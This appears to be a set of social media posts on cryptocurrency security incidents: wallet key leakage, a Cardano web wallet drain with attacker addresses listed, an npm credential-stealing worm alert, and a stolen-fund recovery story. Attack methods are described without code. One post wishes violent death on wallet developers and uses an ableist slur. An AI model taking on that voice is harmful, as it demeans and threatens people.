Cos(余弦)😶‍🌫️ (@evilcos)

有一类钱包被盗是因为其私钥/助记词早就因为某些原因被采集走了，某些人利用某些便利机会在这些“大数据”里捞鱼...私钥或助记词都有很成熟的解析方式，哪怕是图片保存的...这种产业链很成熟，但要知道真的泄露源头挺难的。 比如剪切板劫持是一种常见手法，还有第三方 App 作恶，采集相册里的助记词截图，更别提供应链攻击、假 App 等。甚至许多刚开始并不是针对币圈的攻击... 许多钓鱼，通过链上分析很容易推出其手法。但是私钥泄露许多时候不容易分析出其具体手法，尤其是电脑本地环境，太乱太复杂，有的作恶后直接就升级替换成正常的了。 一旦意识到自己的私钥/助记词泄露了，除非你知道具体原因，否则都应该重整一遍，做到你的环境你有把握这种地步。 最后我还是会推荐硬件钱包的组合使用模式，比如 OneKey/Keystone 搭配 Rabby/OKX Wallet/MetaMask，imKey 搭配 imToken，KeyPal 搭配 TokenPocket 是我的组合，也即硬件钱包+软件钱包模式，我确保的是至少私钥/助记词永远不触网，剩下的就是看懂所有签名内容，看不懂的直接忽略就好。 当然为了方便，我也大胆地在电脑浏览器上的一些知名钱包扩展里导入我的助记词或私钥，如果真的被盗了，这个资金我是认栽的...只是如果我的被盗，我肯定会找出原因... 风险和安全每个人的承受能力不一样，选择适合自己的就好。

One of my 4am tweets mentions nonce reuse. I was speaking casually bc I was flabbergasted by just how fucking stupid this is. And nonce reuse is historically the stupidest thing so they got crossed in my heads. I got the other one right, so I'll repeat it now: These guys rolled their own crypto so fucking hard that anyone could get your private key from public information. Cardano should stop obsessing over whether this is a Cardano hack and realize that THIS IS INSANE. Fucking up the nonces is common with ECDSA. It is NOT EdDSA/Ed25519. This shit was intentionally DESIGNED to eliminate the footguns that are common with EDCSA. It took WORK for the developers of this wallet to accomplish this. Using the standard crypto libs—which are used by all wallets in a sane universe—would NOT result in this issue. If you are building a wallet and cant get the bare minimum correct, you deserve to die a violent and bloody death. NO ONE should not expect someone who cannot even walk to be able to run, jump, skip, hop, etc. And ALL of those skills are necessary when building a wallet in this adversarial ass space. This must be the end of Emurgo/SecondFi/Yoroi. If you forgive and forget, you are sealing your own fate and being willfully fucking retarded.

We aim to provide the latest update on our investigation into the exploit As mentioned in our previous post, between June 21–23, 2026, a sophisticated, automated attack drained funds from multiple Cardano wallets. We now have identified and isolated the addresses of 2 attackers. We are sharing them below with the community, for full transparency. Attacker A (Waves 1 & 2) Drained 171 wallets across two automated batches. • Collection Wallet 1: addr1q9j7f598x988unr4zhjulft205jqnn9ewgwkhes5smf2sr6jsw98nm4qq38jw9epe587twavuhuhj5d8r92rjvmyjlzs9lqc3x • Collection Wallet 2: addr1q9wudkfeelzwev427yvapkmqexmet8q4vl303m7a4eerwtvt6rq00zyuqzeuw759vgqtdky0gyxnqx27n8q4k6h79yhsqelma8 • Collection Wallet 3: addr1q82jlp2u0ezv2hsf6f40fkrv49hd72yv442nmrr5qeultpqamepaykp3m564hnd4zp75wxxds2j6d3ywvc8prhf2kcxqn6nql3 • Central Fee/Change Address: addr1q8acx4h5a38x6ekpsp0x7aelw6mflt78khmz8lz75rtnqvn07w88zx2e89tgzqr3x0mecngqlg87kq9surhk48hj79mqcezfa8 • Attacker Stake Key: Stake1u9hl8rn3r9vnj45pqpcn8auuf5q05rltqzcwpmm2nme0zasf40ymg Attacker B (Wave 3) Drained 203 wallets in a separate automated sweep. • Collection Wallet (⚠️ 4,020,468 ADA linked to the exploit remains in this address, which has been flagged and is under active monitoring and investigation): •addr1q8m5wdncq7rwum73r5cyyr82qx2xjem5k4ehapl3wy36aaerj829vasl3amtcwshgvnn6a25dr850tfw6qaj420d2szsslkku6 • Attacker Stake Key: stake1uy3er4zkwc0c7a4u8gt5xfeaw42x3n6845hdqwe248k4gpgdq4da5

🚨 SlowMist TI Alert 🚨 A new Shai-Hulud / Miasma / Hades npm malware variant linked to the compromised npm developer account czirker, affecting the npm ecosystem. The campaign uses a preconfigured binding.gyp file to execute during npm install; reported scope includes 23 affected packages, with leo-logger noted at 3,140 weekly npm downloads. As of the tweet publication time, 408 infected GitHub repositories containing stolen credentials had already been observed. Potential attacker actions include GitHub token theft, npm token theft, AWS / GCP / Azure credential theft, local environment data exfiltration, malicious GitHub workflow abuse, and further npm supply-chain propagation. Security teams should immediately check lockfiles and package histories for affected versions, downgrade or remove impacted packages, rotate npm, GitHub, cloud, CI/CD, and application secrets, enforce 2FA. Thanks to @OX__Security for the excellent analysis. As always, stay vigilant! The following URL can be used to track the latest situation:

GM☕️ 成功追回来部分被盗资金😭 想不到我竟然有机会 Update 这条推文的最新进展🫠。昨晚 FixedFloat 把 10,319 USDC 的被盗资金退到我新钱包了。 距离 2025 年 9 月 4 日被盗，8 个多月。多链资产合计大概 10w 美刀，那一晚就那么没了。报警 + 找漫雾（@SlowMist_Team）做链上追踪后，就是漫长的拉锯——今年 Q1 黑客把其中一部分 USDC 通过 8 个地址送进了 FixedFloat，漫雾的 Tony 哥一路协助沟通冻结，香港警方 CSTCB 加密货币组最终发了正式 Recovery Request，FixedFloat 归还了其中一笔 1wU。 讲真的，10w 被盗追回 1w，比例上不算多。但这一笔能拿回来，已经超出我一开始的预期了。 链上追讨这条路，结论是：可行，但慢，且看运气。可行在于一旦资金进了 CEX、swap 平台这种「有客服、有法务、有合规」的服务方，理论上就有冻结窗口；慢在于跨境合规流程；运气在于黑客是否把资金送到 CEX 平上等你来追——大部分情况下，他打进诸如 XMR 等隐私链路那一刻就已经没希望了，太难追踪了，能拦下来的只是诸多链条中充值 CEX 的那一小部分。 衷心感谢漫雾（@SlowMist_Team）整个团队这大半年的协助，特别是 Tony 哥一路推进案件不嫌烦，从追踪报告到与 FixedFloat 沟通到与警方对接全程都在！也感谢香港警局和 CSTCB 的阿 Sir🙏。 「Not your key, not your money」，这次我真的记下了🤡 #Web3Security#

As per our previous post: We have identified the root cause and have since rolled out a patch for all unaffected wallets. This will allow us to resume normal operations soon. ----- Regarding affected wallets, 4 distinct draining events occurred. 3 were executed by external threat actors, resulting in a loss of ~16m ADA across 374 addresses. To prevent total loss during the active exploit, emergency rescue measures were triggered to secure the available ~129m ADA and continues to be routed to an independent, qualified third-party custodian, where they are held securely for the benefit of the affected wallet addresses. An external accounting firm has been engaged for a special audit to independently verify those holdings. We are working to facilitate the verification process so users can claim back their assets safely. Affected users should submit their claim at We take this incident seriously and are working to ensure all assets are returned to affected users as soon as possible. As stated, we have identified the root cause, it is at the address level. Please DO NOT RESTORE your recovery phrase into another Cardano wallet, this does not mitigate the security risk. The security risk occurs when an affected user signs a transaction. Further explanation to follow.

吴说获悉，Cardano 生态项目 SecondFi 就近期安全事件发布调查进展，称已确认问题根源来自其原生 Cardano Web 钱包生成软件，影响范围未超出该组件。团队已完成链上分析，并正与一家区块链安全公司进行独立技术审查以验证调查结果。目前估计事件造成约 1600 万枚 ADA 损失。SecondFi 表示，平台仍处于安全维护模式，并已完成用户余额快照，同时正与 Input Output（IOG）、Cardano Foundation、Intersect 及 SundaeSwap 等 Cardano 生态机构合作，监测交易所相关资金流向并降低事件对其他协议的影响。

Welcome @SlowMist_Team as the security support partner of HTX Genesis Hackathon 🛡️ As a global leading blockchain security company, SlowMist will provide AI-driven, full-chain security solutions for this hackathon, supporting builders with integrated protection from threat detection to defense. Innovation needs courage. Security needs to keep up. Registration is still open — scan the QR code on the poster and join now👇 #HTXDAO# #HTXGenesisHackathon# #SlowMist#